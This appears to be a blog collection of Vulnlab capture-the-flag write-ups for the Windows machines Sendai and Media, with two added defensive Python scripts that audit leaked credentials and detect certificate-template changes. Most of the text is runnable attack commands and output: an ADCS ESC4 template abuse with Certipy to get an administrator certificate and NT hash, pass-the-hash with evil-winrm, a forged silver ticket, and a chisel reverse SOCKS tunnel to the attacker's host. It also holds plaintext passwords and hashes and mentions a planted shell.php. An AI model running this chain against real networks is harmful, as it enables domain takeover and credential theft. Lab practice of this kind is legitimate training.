+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+
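Added example, not from the writeup or from PrivescCheck: a Python scanner for the two places this box leaked credentials, the `.sqlconfig` connection string on the config share and the `Support` service whose ImagePath passes a user name and password on the command line. It parses connection strings, reports and redacts password fields, and picks out `-u`/`-p` style options from service command lines so a list of ImagePath values (from `sc qc`, the registry, or PrivescCheck's output) can be audited in bulk. The inputs are constructed to mirror the artefacts above with the secrets replaced by placeholders.

```python
import re

# Constructed inputs modelled on the artefacts above; secrets replaced with placeholders.
SQLCONFIG = "Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=<REDACTED>;"
SERVICE_IMAGE_PATHS = {
    "Support": r"C:\WINDOWS\helpdesk.exe -u clifford.davey -p <REDACTED> -k netsvcs",
    "MSSQL$SQLEXPRESS": r'"C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS',
    "ssh-agent": r"C:\Windows\System32\OpenSSH\ssh-agent.exe",
}

# Connection-string keys that hold a secret (ADO.NET accepts both spellings).
PASSWORD_KEYS = ("password", "pwd")


def parse_connection_string(cs):
    """Split an ADO.NET-style 'key=value;' string into a dict with lower-cased keys."""
    fields = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def connection_string_has_password(cs):
    fields = parse_connection_string(cs)
    return any(fields.get(k) for k in PASSWORD_KEYS)


def redact_connection_string(cs):
    """Same string with every password value replaced, safe to paste into a ticket or report."""
    parts = []
    for part in cs.split(";"):
        if "=" in part and part.split("=", 1)[0].strip().lower() in PASSWORD_KEYS:
            part = part.split("=", 1)[0] + "=***"
        parts.append(part)
    return ";".join(parts)


# Command-line options that commonly carry a user name or password, with their value.
CRED_OPTION = re.compile(
    r"(?<!\S)(?P<opt>-(?:u|user|p|pass|password|-user|-password))[\s=:]+(?P<val>\S+)", re.I
)


def image_path_credentials(image_path):
    """Return {'user': ..., 'password': ...} for whatever the command line exposes."""
    found = {}
    for m in CRED_OPTION.finditer(image_path):
        opt = m["opt"].lower().lstrip("-")
        found["user" if opt in ("u", "user") else "password"] = m["val"]
    return found


def services_with_embedded_passwords(image_paths):
    """Names of services whose ImagePath carries a password argument."""
    return sorted(name for name, path in image_paths.items() if "password" in image_path_credentials(path))
```

On the Support service the finding is the password, but the user name is worth capturing too: it tells you which account the exposed secret belongs to, and on this box it is a domain user, so the blast radius is the domain and not just the host.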

.

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

findings

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse the template

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Run certipy-ad again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
Running certipy-ad find again, the template now shows:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"
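Added example, not part of the writeup: the two greps above are a before/after view of one template, ESC4 for ca-operators first, then ESC1 through ESC4 for Authenticated Users once the template was rewritten. That is exactly the kind of change a defender wants to catch, so this Python compares two Certipy `find` JSON reports and reports ESC codes that are new and watched template attributes that changed. The reports here are constructed miniatures; their layout ("Certificate Templates" keyed by index, findings under "[!] Vulnerabilities") is an assumption modelled on Certipy v4's JSON output, and the attribute values are invented to reproduce the findings shown above.

```python
import json

# Constructed miniature Certipy "find" reports (layout assumed, values invented for the example).
BEFORE_JSON = r"""
{"Certificate Templates": {"0": {
  "Template Name": "SendaiComputer",
  "Enabled": true,
  "Client Authentication": true,
  "Enrollee Supplies Subject": false,
  "Requires Manager Approval": false,
  "Extended Key Usage": ["Client Authentication"],
  "Permissions": {
    "Enrollment Permissions": {"Enrollment Rights": ["SENDAI.VL\\Domain Computers"]},
    "Object Control Permissions": {"Write Property Principals": ["SENDAI.VL\\ca-operators"]}},
  "[!] Vulnerabilities": {"ESC4": "'SENDAI.VL\\ca-operators' has dangerous permissions"}
}}}
"""
AFTER_JSON = r"""
{"Certificate Templates": {"0": {
  "Template Name": "SendaiComputer",
  "Enabled": true,
  "Client Authentication": true,
  "Enrollee Supplies Subject": true,
  "Requires Manager Approval": false,
  "Extended Key Usage": ["Client Authentication", "Any Purpose", "Certificate Request Agent"],
  "Permissions": {
    "Enrollment Permissions": {"Enrollment Rights": ["SENDAI.VL\\Authenticated Users"]},
    "Object Control Permissions": {"Write Property Principals": ["SENDAI.VL\\Authenticated Users"]}},
  "[!] Vulnerabilities": {
    "ESC1": "'SENDAI.VL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
    "ESC2": "'SENDAI.VL\\Authenticated Users' can enroll and template can be used for any purpose",
    "ESC3": "'SENDAI.VL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
    "ESC4": "'SENDAI.VL\\Authenticated Users' has dangerous permissions"}
}}}
"""

# Template attributes whose change alone is worth an alert.
WATCHED_FIELDS = ("Enabled", "Client Authentication", "Enrollee Supplies Subject",
                  "Requires Manager Approval", "Extended Key Usage")


def load_report(text):
    return json.loads(text)


def templates_by_name(report):
    templates = report.get("Certificate Templates", {})
    if not isinstance(templates, dict):  # assumed: Certipy writes a message string when there are none
        return {}
    return {t["Template Name"]: t for t in templates.values() if isinstance(t, dict) and "Template Name" in t}


def esc_findings(report):
    """{template: {ESCn: description}} for every template Certipy flagged."""
    return {name: dict(t["[!] Vulnerabilities"])
            for name, t in templates_by_name(report).items() if t.get("[!] Vulnerabilities")}


def new_findings(before, after):
    """ESC codes present in AFTER but absent in BEFORE, per template."""
    old, new = esc_findings(before), esc_findings(after)
    return {name: sorted(c for c in codes if c not in old.get(name, {}))
            for name, codes in new.items() if set(codes) - set(old.get(name, {}))}


def enrollment_rights(template):
    return template.get("Permissions", {}).get("Enrollment Permissions", {}).get("Enrollment Rights", [])


def template_drift(before, after):
    """Per template, the watched attributes whose value changed between the two reports."""
    b, a = templates_by_name(before), templates_by_name(after)
    drift = {}
    for name in sorted(set(b) | set(a)):
        if name not in b or name not in a:
            drift[name] = {"present": (name in b, name in a)}
            continue
        changes = {f: (b[name].get(f), a[name].get(f)) for f in WATCHED_FIELDS if b[name].get(f) != a[name].get(f)}
        if enrollment_rights(b[name]) != enrollment_rights(a[name]):
            changes["Enrollment Rights"] = (enrollment_rights(b[name]), enrollment_rights(a[name]))
        if changes:
            drift[name] = changes
    return drift
```

Run it against two real `*_Certipy.json` files from consecutive `find` runs (`template_drift(load_report(open(old).read()), load_report(open(new).read()))`); a scheduled run that alerts on any non-empty drift turns the ESC4 write right into something noticed the moment it is used.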

Request Administrator Cert

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixed the "NETBIOS connection with the remote host timed out" error by changing the order of the names in /etc/hosts to:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Obtain a TGT and the Administrator NT hash

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Another way to root (not finished yet)

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

Set up a chisel listener

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

then

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

and from sendai box

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

Work in progress.

Chisel itself is working fine; a request through the SOCKS proxy reaches IIS on the box:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

something must be wrong with my impacket-mssqlclient: Encryption required, switching to TLS

vulnlab-media

vulnlab media

a medium Windows machine

Tools used: ntlm_theft, FullPowers.exe, GodPotato.exe

First upload a video file, catch the hash with Responder, and crack it with John.

Then SSH into the box.

Examine index.php, and query the ApacheHTTPServer service in the registry for a clue what to do.

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

 

make everything ready as below

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*   
C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..

